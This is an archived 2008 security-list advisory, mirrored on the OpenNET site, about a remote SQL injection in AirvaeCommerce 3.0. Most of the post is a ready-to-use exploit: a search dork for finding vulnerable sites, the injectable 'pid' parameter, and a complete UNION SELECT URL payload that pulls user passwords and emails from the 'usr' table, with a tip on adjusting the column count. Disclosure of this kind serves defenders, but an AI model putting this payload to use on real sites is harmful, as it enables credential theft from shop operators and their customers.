The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Remote SQL Injection


<< Previous INDEX Search src / Print Next >>
Date: 28 Jun 2008 17:33:49 -0000
From: [email protected]
To: [email protected]
Subject: Remote SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

Author :: Dr-Linux saidmoftakhar(at)gmx(dot)de
Application :: AirvaeCommerce 3.0
Download :: http://www.airvaecommerce.com
Dork 1 ::  powered by AirvaeCommerce 3.0
--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http://localhost/ path script / ?p=vzh&pid= [SQL]
Example : /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
           ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/*

Note : Some site used SELECT statements have a different number of columns about 45  .
 
-------------------------------------------[End of  context]----------------------------------------


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру